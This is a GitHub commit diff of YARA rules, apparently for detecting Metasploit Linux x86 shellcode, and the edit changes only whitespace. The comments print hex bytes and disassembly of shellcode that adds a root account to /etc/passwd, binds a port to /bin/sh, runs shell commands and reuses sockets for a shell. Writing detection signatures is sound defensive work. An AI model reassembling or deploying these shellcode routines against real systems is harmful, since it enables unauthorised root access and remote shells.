Skip to content

Commit

Permalink
fix typo in block comment
Browse files Browse the repository at this point in the history
  • Loading branch information
thewhiteninja committed Aug 15, 2020
1 parent 17206b3 commit 43a8df5
Show file tree
Hide file tree
Showing 120 changed files with 10,015 additions and 10,270 deletions.
50 changes: 25 additions & 25 deletions linux/shellcode-linux-x86-single_adduser.asm.yar
Original file line number Diff line number Diff line change
Expand Up @@ -6,24 +6,24 @@

/*
31C9 | 1. | xor ecx, ecx
89CB | .. | mov ebx, ecx
6A46 | jF | push byte 0x46
58 | X | pop eax
CD80 | .. | int 0x80
6A05 | j. | push byte 0x05
58 | X | pop eax
31C9 | 1. | xor ecx, ecx
51 | Q | push ecx
6873737764 | hsswd | push dword 0x64777373
682F2F7061 | h//pa | push dword 0x61702f2f
682F657463 | h/etc | push dword 0x6374652f
89E3 | .. | mov ebx, esp
41 | A | inc ecx
B504 | .. | mov ch, 0x04
CD80 | .. | int 0x80
93 | . | xchg eax, ebx
E820000000 | . ... | call getstr
6162633A61616E76336D33357662632F673A303A303A3A2F3A2F62696E2F7368 | abc:aanv3m35vbc/g:0:0::/:/bin/sh | #ommited# db "abc:aanv3m35vbc/g:0:0::/:/bin/sh"
89CB | .. | mov ebx, ecx
6A46 | jF | push byte 0x46
58 | X | pop eax
CD80 | .. | int 0x80
6A05 | j. | push byte 0x05
58 | X | pop eax
31C9 | 1. | xor ecx, ecx
51 | Q | push ecx
6873737764 | hsswd | push dword 0x64777373
682F2F7061 | h//pa | push dword 0x61702f2f
682F657463 | h/etc | push dword 0x6374652f
89E3 | .. | mov ebx, esp
41 | A | inc ecx
B504 | .. | mov ch, 0x04
CD80 | .. | int 0x80
93 | . | xchg eax, ebx
E820000000 | . ... | call getstr
6162633A61616E76336D33357662632F673A303A303A3A2F3A2F62696E2F7368 | abc:aanv3m35vbc/g:0:0::/:/bin/sh | #ommited# db "abc:aanv3m35vbc/g:0:0::/:/bin/sh"
*/

strings:
Expand All @@ -41,13 +41,13 @@

/*
59 | Y | pop ecx
8B51FC | .Q. | mov edx, [ecx-4]
6A04 | j. | push byte 0x04
58 | X | pop eax
CD80 | .. | int 0x80
6A01 | j. | push byte 0x01
58 | X | pop eax
CD80 | .. | int 0x80
8B51FC | .Q. | mov edx, [ecx-4]
6A04 | j. | push byte 0x04
58 | X | pop eax
CD80 | .. | int 0x80
6A01 | j. | push byte 0x01
58 | X | pop eax
CD80 | .. | int 0x80
*/

strings:
Expand Down
84 changes: 42 additions & 42 deletions linux/shellcode-linux-x86-single_bind_tcp_shell.asm.yar
Original file line number Diff line number Diff line change
Expand Up @@ -6,15 +6,15 @@

/*
6A7D | j} | push byte 0x7d
58 | X | pop eax
99 | . | cdq
B207 | .. | mov dl, 0x7
B900100000 | ..... | mov ecx, 0x1000
89E3 | .. | mov ebx, esp
6681E300F0 | f.... | and bx, 0xf000
CD80 | .. | int 0x80
31DB | 1. | xor ebx, ebx
F7E3 | .. | mul ebx
58 | X | pop eax
99 | . | cdq
B207 | .. | mov dl, 0x7
B900100000 | ..... | mov ecx, 0x1000
89E3 | .. | mov ebx, esp
6681E300F0 | f.... | and bx, 0xf000
CD80 | .. | int 0x80
31DB | 1. | xor ebx, ebx
F7E3 | .. | mul ebx
*/

strings:
Expand All @@ -32,12 +32,12 @@

/*
53 | S | push ebx
43 | C | inc ebx
53 | S | push ebx
6A02 | j. | push byte 0x2
89E1 | .. | mov ecx, esp
B066 | .f | mov al, 0x66
CD80 | .. | int 0x80
43 | C | inc ebx
53 | S | push ebx
6A02 | j. | push byte 0x2
89E1 | .. | mov ecx, esp
B066 | .f | mov al, 0x66
CD80 | .. | int 0x80
*/

strings:
Expand All @@ -55,16 +55,16 @@

/*
5B | [ | pop ebx
5E | ^ | pop esi
52 | R | push edx
680200BFBF | h.... | push 0xbfbf0002
6A10 | j. | push byte 0x10
51 | Q | push ecx
50 | P | push eax
89E1 | .. | mov ecx, esp
6A66 | jf | push byte 0x66
58 | X | pop eax
CD80 | .. | int 0x80
5E | ^ | pop esi
52 | R | push edx
680200BFBF | h.... | push 0xbfbf0002
6A10 | j. | push byte 0x10
51 | Q | push ecx
50 | P | push eax
89E1 | .. | mov ecx, esp
6A66 | jf | push byte 0x66
58 | X | pop eax
CD80 | .. | int 0x80
*/

strings:
Expand All @@ -82,8 +82,8 @@

/*
D1E3 | .. | shl ebx, 1
B066 | .f | mov al, 0x66
CD80 | .. | int 0x80
B066 | .f | mov al, 0x66
CD80 | .. | int 0x80
*/

strings:
Expand All @@ -101,10 +101,10 @@

/*
43 | C | inc ebx
B066 | .f | mov al, 0x66
895104 | .Q. | mov [ecx+4], edx
CD80 | .. | int 0x80
93 | . | xchg eax, ebx
B066 | .f | mov al, 0x66
895104 | .Q. | mov [ecx+4], edx
CD80 | .. | int 0x80
93 | . | xchg eax, ebx
*/

strings:
Expand All @@ -122,9 +122,9 @@

/*
B03F | .? | mov al, 0x3f
CD80 | .. | int 0x80
49 | I | dec ecx
79F9 | y. | jns dup_loop
CD80 | .. | int 0x80
49 | I | dec ecx
79F9 | y. | jns dup_loop
*/

strings:
Expand All @@ -142,14 +142,14 @@

/*
B00B | .. | mov al, 0xb
52 | R | push edx
682F2F7368 | h//sh | push dword 0x68732f2f
682F62696E | h/bin | push dword 0x6e69622f
89E3 | .. | mov ebx, esp
52 | R | push edx
53 | S | push ebx
89E1 | .. | mov ecx, esp
CD80 | .. | int 0x80
52 | R | push edx
682F2F7368 | h//sh | push dword 0x68732f2f
682F62696E | h/bin | push dword 0x6e69622f
89E3 | .. | mov ebx, esp
52 | R | push edx
53 | S | push ebx
89E1 | .. | mov ecx, esp
CD80 | .. | int 0x80
*/

strings:
Expand Down
28 changes: 14 additions & 14 deletions linux/shellcode-linux-x86-single_exec.asm.yar
Original file line number Diff line number Diff line change
Expand Up @@ -6,17 +6,17 @@

/*
6A0B | j. | push byte 0xb
58 | X | pop eax
99 | . | cdq
52 | R | push edx
66682D63 | fh-c | push word 0x632d
89E7 | .. | mov edi, esp
682F736800 | h/sh. | push dword 0x0068732f
682F62696E | h/bin | push dword 0x6e69622f
89E3 | .. | mov ebx, esp
52 | R | push edx
E809000000 | ..... | call getstr
6563686F206D303000 | echo m00. | #ommited# db "echo m00", 0x00
58 | X | pop eax
99 | . | cdq
52 | R | push edx
66682D63 | fh-c | push word 0x632d
89E7 | .. | mov edi, esp
682F736800 | h/sh. | push dword 0x0068732f
682F62696E | h/bin | push dword 0x6e69622f
89E3 | .. | mov ebx, esp
52 | R | push edx
E809000000 | ..... | call getstr
6563686F206D303000 | echo m00. | #ommited# db "echo m00", 0x00
*/

strings:
Expand All @@ -34,9 +34,9 @@

/*
57 | W | push edi
53 | S | push ebx
89E1 | .. | mov ecx, esp
CD80 | .. | int 0x80
53 | S | push ebx
89E1 | .. | mov ecx, esp
CD80 | .. | int 0x80
*/

strings:
Expand Down
60 changes: 30 additions & 30 deletions linux/shellcode-linux-x86-single_find_tcp_shell.asm.yar
Original file line number Diff line number Diff line change
Expand Up @@ -6,14 +6,14 @@

/*
53 | S | push ebx
89E6 | .. | mov esi, esp
6A40 | j@ | push byte 0x40
B70A | .. | mov bh, 0xa
53 | S | push ebx
56 | V | push esi
53 | S | push ebx
89E1 | .. | mov ecx, esp
86FB | .. | xchg bh, bl
89E6 | .. | mov esi, esp
6A40 | j@ | push byte 0x40
B70A | .. | mov bh, 0xa
53 | S | push ebx
56 | V | push esi
53 | S | push ebx
89E1 | .. | mov ecx, esp
86FB | .. | xchg bh, bl
*/

strings:
Expand All @@ -31,12 +31,12 @@

/*
66FF01 | f.. | inc word [ecx]
6A66 | jf | push byte 0x66
58 | X | pop eax
CD80 | .. | int 0x80
813E6D736621 | .>msf! | cmp dword [esi], 0x2166736d
75F0 | u. | jnz findtag
5F | _ | pop edi
6A66 | jf | push byte 0x66
58 | X | pop eax
CD80 | .. | int 0x80
813E6D736621 | .>msf! | cmp dword [esi], 0x2166736d
75F0 | u. | jnz findtag
5F | _ | pop edi
*/

strings:
Expand All @@ -54,8 +54,8 @@

/*
89FB | .. | mov ebx, edi
6A02 | j. | push byte 0x2
59 | Y | pop ecx
6A02 | j. | push byte 0x2
59 | Y | pop ecx
*/

strings:
Expand All @@ -73,10 +73,10 @@

/*
6A3F | j? | push byte 0x3f
58 | X | pop eax
CD80 | .. | int 0x80
49 | I | dec ecx
79F8 | y. | jns dup_loop
58 | X | pop eax
CD80 | .. | int 0x80
49 | I | dec ecx
79F8 | y. | jns dup_loop
*/

strings:
Expand All @@ -94,16 +94,16 @@

/*
6A0B | j. | push byte 0xb
58 | X | pop eax
99 | . | cdq
52 | R | push edx
682F2F7368 | h//sh | push dword 0x68732f2f
682F62696E | h/bin | push dword 0x6e69622f
89E3 | .. | mov ebx, esp
52 | R | push edx
53 | S | push ebx
89E1 | .. | mov ecx, esp
CD80 | .. | int 0x80
58 | X | pop eax
99 | . | cdq
52 | R | push edx
682F2F7368 | h//sh | push dword 0x68732f2f
682F62696E | h/bin | push dword 0x6e69622f
89E3 | .. | mov ebx, esp
52 | R | push edx
53 | S | push ebx
89E1 | .. | mov ecx, esp
CD80 | .. | int 0x80
*/

strings:
Expand Down
Loading

0 comments on commit 43a8df5

Please sign in to comment.